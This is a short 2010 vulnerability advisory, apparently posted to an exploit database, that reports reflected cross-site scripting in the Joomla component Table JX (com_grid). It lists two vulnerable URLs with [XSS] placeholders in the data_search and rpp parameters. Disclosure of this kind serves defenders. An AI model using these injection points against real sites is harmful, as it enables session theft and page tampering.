# Exploit Title: Joomla Component Table JX XSS Vulnerabilities# Date: 01.05.2010# Author: Valentin# Category: webapps/0day# Code : [::::::::::::::::::::::::::::::::::::::0x1::::::::::::::::::::::::::::::::::::::]>> General Information
Advisory/Exploit Title = Joomla Component Table JX XSS Vulnerabilities
Author = Valentin Hoebel
Contact = valentin@xenuser.org
[::::::::::::::::::::::::::::::::::::::0x2::::::::::::::::::::::::::::::::::::::]>> Product information
Name = Table JX
Vendor = Tools JX
Vendor Website = http://www.toolsjx.com
Affected Version(s)=all[::::::::::::::::::::::::::::::::::::::0x3::::::::::::::::::::::::::::::::::::::]>>#1 Vulnerability
Type = XSS
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=[XSS]
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=[XSS]
In case you wonder: Yes, those are exactely the same URIs like in the other Joomla
component "Card View JX". Both of them seem to be named "com_grid"and use exactely
the same architecture, parameters etc. Therefore both of them are vulnerable to
the same XSS attacks.[::::::::::::::::::::::::::::::::::::::0x4::::::::::::::::::::::::::::::::::::::]>> Additional Information
Advisory/Exploit Published =01.05.2010[::::::::::::::::::::::::::::::::::::::0x5::::::::::::::::::::::::::::::::::::::]>> Misc
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
<3 packetstormsecurity.org!
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]